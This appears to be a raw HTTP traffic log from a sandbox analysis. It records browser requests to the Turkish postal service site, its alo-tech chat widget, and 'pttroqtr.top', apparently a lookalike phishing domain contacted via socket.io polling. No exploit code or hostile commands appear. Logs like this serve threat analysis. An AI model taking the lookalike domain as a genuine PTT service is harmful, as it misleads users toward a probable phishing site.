Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjj27&sid=r_NtitDKgtItMN5FAEgD HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjigq&sid=r_NtitDKgtItMN5FAEgD HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjih1&sid=r_NtitDKgtItMN5FAEgD HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Kargo/PttYurtIciKargoHizmetleri.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1443587032.1727494784; _ga_SFQ172Y7CH=GS1.1.1727494784.1.1.1727494805.0.0.0
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Kargo/PttYurtDisiKargoHizmetleriUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1443587032.1727494784; _ga_SFQ172Y7CH=GS1.1.1727494784.1.1.1727494811.0.0.0
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Banka/PttKartPttMatikUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1443587032.1727494784; _ga_SFQ172Y7CH=GS1.1.1727494784.1.1.1727494816.0.0.0
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
